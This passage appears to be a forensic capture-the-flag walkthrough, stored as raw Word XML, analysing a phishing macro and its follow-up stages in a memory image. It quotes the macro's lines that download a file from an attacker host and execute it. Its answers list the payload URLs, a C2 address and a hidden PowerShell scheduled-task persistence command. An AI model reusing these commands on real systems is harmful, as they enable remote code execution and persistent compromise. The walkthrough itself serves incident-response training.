    <w:p w14:paraId="53CBE701" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>xHttp.Open</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> "GET", "</w:t>
      </w:r>
      <w:hyperlink r:id="rId16" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:b/>
            <w:bCs/>
          </w:rPr>
          <w:t>https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>", False</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>: This opens a GET request to the specified URL ("</w:t>
      </w:r>
      <w:hyperlink r:id="rId17" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>") and sets it to be a synchronous request (False).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="506A0008" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>xHttp.Send</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>: This sends the HTTP request.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D90179D" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>With bStrm ... End With: This block of code sets up the ADODB.Stream to write the response body (the retrieved content) to a file. It specifies the file path as spath &amp; "\update.js".</w:t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r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="6BE69A4E" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Set shell_object = CreateObject("WScript.Shell"): This creates an instance of the WScript.Shell object, which is utilized for running shell commands.</w:t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spellStart"/>
      <w:proofErr w:type="gram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proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="08BA8BFD" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>shell_</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>object.Exec</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> ("wscript.exe C:\ProgramData\update.js")</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>: This executes the command "wscript.exe C:\ProgramData\update.js".</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="779920E1" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="488F4BE0" w14:textId="48881351" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="7FC05E64" wp14:editId="7B09F850">
            <wp:extent cx="5731510" cy="2456180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="8708693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BF32" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 8. What is the PID of the process that launched the second-stage payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19D9AD72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4260</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4EDF9E71" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 9. What is the parent PID of the process that launched the second-stage payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="73CE3F72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1124</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A64F5EB" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command utilized: vol -f WKSTN-2961.raw windows.pstree.PsTree</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6"/>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="1E3B1BCE" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 10. What URL is utilized to retrieve the suspicious binary launched by the second-stage payload?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5CA662BC" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:hyperlink r:id="rId19" w:tgtFrame="_blank" w:history="1">
        <w:r w:rsidRPr="00B87EF6">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
          </w:rPr>
          <w:t>https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.exe</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p w14:paraId="7626A946" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 11. What is the PID of the suspicious process utilized to create the C2 connection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4438E09C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6216</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="550D9604" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 12. What is the full file path of the suspicious process utilized to create the C2 connection?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0540ED06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C:\Windows\Tasks\updater.exe</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26D1C34B" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>related capture for questions 8, 9, 11</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="583DCBFE" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55C7AE82" w14:textId="699A7B4B" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="11F20C94" wp14:editId="4CEADFDA">
            <wp:extent cx="5731510" cy="792480"/>
            <wp:effectExtent l="0" t="0" r="2540" b="7620"/>
            <wp:docPr id="202062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85E5" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:i/>
          <w:iCs/>
        </w:rPr>
        <w:t>related capture for questions 11, 12</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="58E385C5" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B8FBFC4" w14:textId="62BBB857" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="0DD95320" wp14:editId="6A693FA6">
            <wp:extent cx="5731510" cy="1172210"/>
            <wp:effectExtent l="0" t="0" r="2540" b="8890"/>
            <wp:docPr id="765604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9CF1" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 13. What is the IP address and port of the C2 connection initiated by the suspicious binary? (Format: IP address:port)</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p w14:paraId="12DDA21E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128.199.95.189:8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5BA12732" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5069A23F" w14:textId="5B514CA4" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="65569F6E" wp14:editId="49DA6B40">
            <wp:extent cx="5731510" cy="1709420"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="718821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391A" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 14. What is the full file path of the suspicious email attachment based on the memory image?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="41D5A211" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>C:\Users\maxine.beck\AppData\Local\Microsoft\Windows\INetCache\Content.Outlook\WQHGZCFI\Resume_WesleyTaylor (002).doc</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BB73753" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>command utilized: strings WKSTN-2961.raw | grep Resume</w:t>
      </w:r>
      <w:r w:rsidRPr="00B87EF6"/>
    </w:p>
    <w:p w14:paraId="7ED23A20" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620CC8B2" w14:textId="2E217A88" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="472F30A1" wp14:editId="507B881C">
            <wp:extent cx="5731510" cy="452120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="5080"/>
            <wp:docPr id="177231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443C" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Q 15. The threat actor implanted a scheduled task right after establishing the c2 callback. What is the full command utilized by the threat actor to maintain persistent access?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D527707" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Answer: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>schtasks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> /Create /F /SC DAILY /ST 09:00 /TN Updater /TR ‘C:\Windows\System32\</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>WindowsPowerShell</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>\v1.0\powershell.exe -</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>NonI</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> -W hidden -c </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>\”IEX</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t xml:space="preserve"> ([Text.Encoding</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>UNICODE.GetString([Convert</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>]::</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>FromBase64</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>String(</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>(gp HKCU:\Software\Microsoft\Windows\CurrentVersion debug</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>).debug</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>)</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>))\</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="00B87EF6">
        <w:t>”’</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FAD4173" w14:textId="77777777" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:rPr/>
        <w:t>Open the image to view it in full size</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14B4C700" w14:textId="4FBBBD6C" w:rsidR="00B87EF6" w:rsidRPr="00B87EF6" w:rsidRDefault="00B87EF6" w:rsidP="00B87EF6">
      <w:r w:rsidRPr="00B87EF6">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="78695904" wp14:editId="5B11AA36">
            <wp:extent cx="5731510" cy="2456180"/>
            <wp:effectExtent l="0" t="0" r="2540" b="1270"/>
            <wp:docPr id="868168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69F1" w14:textId="77777777" w:rsidR="00063159" w:rsidRDefault="00063159"/>
    <w:sectPr w:rsidR="0006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3FFD"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="277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15B3C"/>
    <w:multiLevelType w:val="multilevel"/>
    <w:tmpl w:val="C4C8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838286">
    <w:abstractNumId w:val="0"/>
  </w:num>
  <w:num w:numId="2" w16cid:durableId="117480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F6"/>
    <w:rsid w:val="00063159"/>
    <w:rsid w:val="00B87EF6"/>
    <w:rsid w:val="00C41285"/>
    <w:rsid w:val="00D6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86A4"/>
  <w15:chartTrackingRefBased/>
  <w15:docId w15:val="{09C3E8E6-BC30-44B1-89EB-E6746CCF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medium.com/@josephalan17201972?source=post_page---byline--e3c847479b91---------------------------------------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files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update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les.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png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hyperlink" Target="https://medium.com/@josephalan17201972?source=post_page---byline--e3c847479b91---------------------------------------" TargetMode="External"/><Relationship Id="rId15" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://medium.com/write?source=promotion_paragraph---post_body_banner_home_for_stories_blocks--e3c847479b91---------------------------------------" TargetMode="External"/><Relationship Id="rId23" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="media/image10.png"/><Relationship Id="rId10" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="mailto:maxine.beck@quicklogisticsorg.onmicrosoft.com" TargetMode="External"/><Relationship Id="rId19" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update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estaylor23@outlook.com" TargetMode="External"/><Relationship Id="rId14" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://files.boogeymanisback.lol/aa2a9c53cbb80416d3b47d85538d9971/update.png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mp</dc:creator>
  <cp:keywords/>
  <dc:description/>
  <cp:lastModifiedBy>pranav mp</cp:lastModifiedBy>
  <cp:revision>1</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2026-05-25T16:30:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2026-05-25T16:31:00Z</dcterms:modified>
</cp:coreProperties>
</file>